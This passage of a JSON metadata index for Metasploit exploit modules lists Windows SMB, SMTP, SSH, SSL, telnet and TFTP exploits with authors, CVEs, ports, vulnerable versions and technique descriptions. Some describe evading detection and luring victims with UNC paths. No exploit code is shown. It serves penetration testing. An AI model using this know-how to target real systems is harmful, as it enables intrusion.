"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Royce @R3dy__ Davis <rdavis@accuvant.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses a valid administrator username and password to execute a powershell\n payload using a similar technique to the \"psexec\" utility provided by SysInternals. The\n payload is encoded in base64 and executed from the commandline using the -encodedcommand\n flag. Using this method, the payload is never written to disk, and given that each payload\n is unique, is less prone to signature based detection. A persist option is provided to\n execute the payload in a while loop in order to maintain a form of persistence. In the\n event of a sandbox observing PSH execution, a delay and other obfuscation may be added to\n avoid detection. In order to avoid interactive process notifications for the current user,\n the psh payload has been reduced in size and wrapped in a powershell invocation which hides\n the window entirely.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-30 12:37:06 +0000",
"path": "/modules/exploits/windows/smb/psexec_psh.rb",
"is_install_path": true,
"ref_name": "windows/smb/psexec_psh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/smb_delivery": {
"name": "SMB Delivery",
"full_name": "exploit/windows/smb/smb_delivery",
"rank": 600,
"disclosure_date": "2016-07-26",
"type": "exploit",
"author": [
"Andrew Smith",
"Russel Van Tuyl"
],
"description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. Currently supports DLLs and Powershell.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/3074"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DLL",
"PSH"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/smb/smb_delivery.rb",
"is_install_path": true,
"ref_name": "windows/smb/smb_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/smb_relay": {
"name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
"full_name": "exploit/windows/smb/smb_relay",
"rank": 600,
"disclosure_date": "2001-03-31",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system\tmust try to\tauthenticate\n to this module. The easiest way to force a SMB authentication attempt\n is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.",
"references": [
"CVE-2008-4037",
"OSVDB-49736",
"MSB-MS08-068",
"URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx",
"URL-http://en.wikipedia.org/wiki/SMBRelay",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/smb_relay.rb",
"is_install_path": true,
"ref_name": "windows/smb/smb_relay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/timbuktu_plughntcommand_bof": {
"name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow",
"full_name": "exploit/windows/smb/timbuktu_plughntcommand_bof",
"rank": 500,
"disclosure_date": "2009-06-25",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.",
"references": [
"CVE-2009-1394",
"OSVDB-55436",
"BID-35496",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb",
"is_install_path": true,
"ref_name": "windows/smb/timbuktu_plughntcommand_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/webexec": {
"name": "WebExec Authenticated User Code Execution",
"full_name": "exploit/windows/smb/webexec",
"rank": 0,
"disclosure_date": "2018-10-24",
"type": "exploit",
"author": [
"Ron <ron@skullsecurity.net>"
],
"description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Native upload"
],
"mod_time": "2018-10-24 09:46:00 +0000",
"path": "/modules/exploits/windows/smb/webexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/webexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/mailcarrier_smtp_ehlo": {
"name": "TABS MailCarrier v2.51 SMTP EHLO Overflow",
"full_name": "exploit/windows/smtp/mailcarrier_smtp_ehlo",
"rank": 400,
"disclosure_date": "2004-10-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.",
"references": [
"CVE-2004-1638",
"OSVDB-11174",
"BID-11535",
"EDB-598"
],
"platform": "Windows",
"arch": "x86",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0 - XP SP1 - EN/FR/GR",
"Windows XP SP2 - EN"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb",
"is_install_path": true,
"ref_name": "windows/smtp/mailcarrier_smtp_ehlo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/mercury_cram_md5": {
"name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",
"full_name": "exploit/windows/smtp/mercury_cram_md5",
"rank": 500,
"disclosure_date": "2007-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2007-4440",
"OSVDB-39669",
"BID-25357"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mercury Mail Transport System 4.51"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb",
"is_install_path": true,
"ref_name": "windows/smtp/mercury_cram_md5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/ms03_046_exchange2000_xexch50": {
"name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow",
"full_name": "exploit/windows/smtp/ms03_046_exchange2000_xexch50",
"rank": 400,
"disclosure_date": "2003-10-15",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. This exploit is *very* unreliable.",
"references": [
"CVE-2003-0714",
"BID-8838",
"OSVDB-2674",
"MSB-MS03-046",
"EDB-113"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Exchange 2000"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb",
"is_install_path": true,
"ref_name": "windows/smtp/ms03_046_exchange2000_xexch50",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/njstar_smtp_bof": {
"name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow",
"full_name": "exploit/windows/smtp/njstar_smtp_bof",
"rank": 300,
"disclosure_date": "2011-10-31",
"type": "exploit",
"author": [
"Dillon Beresford"
],
"description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.",
"references": [
"OSVDB-76728",
"CVE-2011-4040",
"URL-http://www.njstar.com/cms/njstar-communicator",
"EDB-18057"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3",
"Windows Server 2003 SP0",
"Windows Server 2003 SP1/SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb",
"is_install_path": true,
"ref_name": "windows/smtp/njstar_smtp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/sysgauge_client_bof": {
"name": "SysGauge SMTP Validation Buffer Overflow",
"full_name": "exploit/windows/smtp/sysgauge_client_bof",
"rank": 300,
"disclosure_date": "2017-02-28",
"type": "exploit",
"author": [
"Chris Higgins",
"Peter Baris"
],
"description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.",
"references": [
"CVE-2017-6416",
"EDB-41479"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb",
"is_install_path": true,
"ref_name": "windows/smtp/sysgauge_client_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/wmailserver": {
"name": "SoftiaCom WMailserver 1.0 Buffer Overflow",
"full_name": "exploit/windows/smtp/wmailserver",
"rank": 200,
"disclosure_date": "2005-07-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.",
"references": [
"CVE-2005-2287",
"OSVDB-17883",
"BID-14213"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/wmailserver.rb",
"is_install_path": true,
"ref_name": "windows/smtp/wmailserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/ypops_overflow1": {
"name": "YPOPS 0.6 Buffer Overflow",
"full_name": "exploit/windows/smtp/ypops_overflow1",
"rank": 200,
"disclosure_date": "2004-09-27",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This module exploits a stack buffer overflow in the YPOPS POP3\n service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll",
"references": [
"CVE-2004-1558",
"OSVDB-10367",
"BID-11256",
"URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Windows 2000 SP0 Italian",
"Windows 2000 Advanced Server Italian SP4",
"Windows 2000 Advanced Server SP3 English",
"Windows 2000 SP0 English",
"Windows 2000 SP1 English",
"Windows 2000 SP2 English",
"Windows 2000 SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/ypops_overflow1.rb",
"is_install_path": true,
"ref_name": "windows/smtp/ypops_overflow1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freeftpd_key_exchange": {
"name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",
"full_name": "exploit/windows/ssh/freeftpd_key_exchange",
"rank": 200,
"disclosure_date": "2006-05-12",
"type": "exploit",
"author": [
"riaf <riaf@mysec.org>"
],
"description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.",
"references": [
"CVE-2006-2407",
"OSVDB-25569",
"BID-17958"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English",
"Windows 2000 SP0-SP4 German",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freeftpd_key_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freesshd_authbypass": {
"name": "Freesshd Authentication Bypass",
"full_name": "exploit/windows/ssh/freesshd_authbypass",
"rank": 600,
"disclosure_date": "2010-08-11",
"type": "exploit",
"author": [
"Aris",
"kcope",
"Daniele Martini <cyrax@pkcrew.org>",
"Imran E. Dawoodjee <imrandawoodjee <Imran E. Dawoodjee <imrandawoodjee@infosec@gmail.com> (minor improvements)>"
],
"description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). The exploit\n has been tested with both password and public key authentication.",
"references": [
"CVE-2012-6066",
"OSVDB-88006",
"BID-56785",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html",
"URL-https://seclists.org/fulldisclosure/2010/Aug/132"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PowerShell",
"CmdStager upload"
],
"mod_time": "2018-11-18 03:29:17 +0000",
"path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freesshd_authbypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freesshd_key_exchange": {
"name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",
"full_name": "exploit/windows/ssh/freesshd_key_exchange",
"rank": 200,
"disclosure_date": "2006-05-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.",
"references": [
"CVE-2006-2407",
"OSVDB-25463",
"BID-17958"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freesshd_key_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/putty_msg_debug": {
"name": "PuTTY Buffer Overflow",
"full_name": "exploit/windows/ssh/putty_msg_debug",
"rank": 300,
"disclosure_date": "2002-12-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.",
"references": [
"CVE-2002-1359",
"OSVDB-8044",
"URL-http://www.rapid7.com/advisories/R7-0009.html",
"BID-6407"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/putty_msg_debug.rb",
"is_install_path": true,
"ref_name": "windows/ssh/putty_msg_debug",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/securecrt_ssh1": {
"name": "SecureCRT SSH1 Buffer Overflow",
"full_name": "exploit/windows/ssh/securecrt_ssh1",
"rank": 200,
"disclosure_date": "2002-07-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.",
"references": [
"CVE-2002-1059",
"OSVDB-4991",
"BID-5287"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SecureCRT.exe (3.4.4)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb",
"is_install_path": true,
"ref_name": "windows/ssh/securecrt_ssh1",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/sysax_ssh_username": {
"name": "Sysax 5.53 SSH Username Buffer Overflow",
"full_name": "exploit/windows/ssh/sysax_ssh_username",
"rank": 300,
"disclosure_date": "2012-02-27",
"type": "exploit",
"author": [
"Craig Freyman",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.",
"references": [
"OSVDB-79689",
"URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html",
"EDB-18535"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sysax 5.53 on Win XP SP3 / Win2k3 SP0",
"Sysax 5.53 on Win2K3 SP1/SP2"
],
"mod_time": "2018-08-15 14:54:41 +0000",
"path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb",
"is_install_path": true,
"ref_name": "windows/ssh/sysax_ssh_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssl/ms04_011_pct": {
"name": "MS04-011 Microsoft Private Communications Transport Overflow",
"full_name": "exploit/windows/ssl/ms04_011_pct",
"rank": 200,
"disclosure_date": "2004-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). Using the wrong target may not result in an immediate\n crash of the remote system.",
"references": [
"CVE-2003-0719",
"OSVDB-5250",
"BID-10116",
"MSB-MS04-011"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4",
"Windows 2000 SP3",
"Windows 2000 SP2",
"Windows 2000 SP1",
"Windows 2000 SP0",
"Windows XP SP0",
"Windows XP SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssl/ms04_011_pct.rb",
"is_install_path": true,
"ref_name": "windows/ssl/ms04_011_pct",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/telnet/gamsoft_telsrv_username": {
"name": "GAMSoft TelSrv 1.5 Username Buffer Overflow",
"full_name": "exploit/windows/telnet/gamsoft_telsrv_username",
"rank": 200,
"disclosure_date": "2000-07-17",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. The service terminates after exploitation,\n so you only get one chance!",
"references": [
"CVE-2000-0665",
"OSVDB-373",
"BID-1478",
"URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip"
],
"platform": "Windows",
"arch": "x86",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP0/4 English REMOTE",
"Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)",
"Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb",
"is_install_path": true,
"ref_name": "windows/telnet/gamsoft_telsrv_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/telnet/goodtech_telnet": {
"name": "GoodTech Telnet Server Buffer Overflow",
"full_name": "exploit/windows/telnet/goodtech_telnet",
"rank": 200,
"disclosure_date": "2005-03-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.",
"references": [
"CVE-2005-0768",
"OSVDB-14806",
"BID-12815"
],
"platform": "Windows",
"arch": "",
"rport": 2380,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
"is_install_path": true,
"ref_name": "windows/telnet/goodtech_telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/attftp_long_filename": {
"name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow",
"full_name": "exploit/windows/tftp/attftp_long_filename",
"rank": 200,
"disclosure_date": "2006-11-27",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.",
"references": [
"CVE-2006-6184",
"OSVDB-11350",
"BID-21320",
"EDB-2887"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT SP4 English",
"Windows 2000 SP0 English",
"Windows 2000 SP1 English",
"Windows 2000 SP2 English",
"Windows 2000 SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0/1 English",
"Windows XP SP2 English",
"Windows XP SP3 English",
"Windows Server 2003",
"Windows Server 2003 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/attftp_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/attftp_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/distinct_tftp_traversal": {
"name": "Distinct TFTP 3.10 Writable Directory Traversal Execution",
"full_name": "exploit/windows/tftp/distinct_tftp_traversal",
"rank": 600,
"disclosure_date": "2012-04-08",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Distinct TFTP server. The\n software contains a directory traversal vulnerability that allows a remote\n attacker to write arbitrary file to the file system, which results in\n code execution under the context of 'SYSTEM'.",
"references": [
"OSVDB-80984",
"EDB-18718",
"URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf",
"CVE-2012-6664"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Distinct TFTP 3.10 on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb",
"is_install_path": true,
"ref_name": "windows/tftp/distinct_tftp_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/dlink_long_filename": {
"name": "D-Link TFTP 1.0 Long Filename Buffer Overflow",
"full_name": "exploit/windows/tftp/dlink_long_filename",
"rank": 400,
"disclosure_date": "2007-03-12",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. For best results,\n use bind payloads with nonx (No NX).",
"references": [
"CVE-2007-1435",
"OSVDB-33977",
"BID-22923"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows 2000 SP3 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/dlink_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/dlink_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/futuresoft_transfermode": {
"name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow",
"full_name": "exploit/windows/tftp/futuresoft_transfermode",
"rank": 200,
"disclosure_date": "2005-05-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).",
"references": [
"CVE-2005-1812",
"OSVDB-16954",
"BID-13821"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows NT SP5/SP6a English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb",
"is_install_path": true,
"ref_name": "windows/tftp/futuresoft_transfermode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/netdecision_tftp_traversal": {
"name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution",
"full_name": "exploit/windows/tftp/netdecision_tftp_traversal",
"rank": 600,
"disclosure_date": "2009-05-16",
"type": "exploit",
"author": [
"Rob Kraus",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary file to the file system, which results in code execution under\n the context of user executing the TFTP Server.",
"references": [
"CVE-2009-1730",
"OSVDB-54607",
"BID-35002"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb",
"is_install_path": true,
"ref_name": "windows/tftp/netdecision_tftp_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/opentftp_error_code": {
"name": "OpenTFTP SP 1.4 Error Packet Overflow",
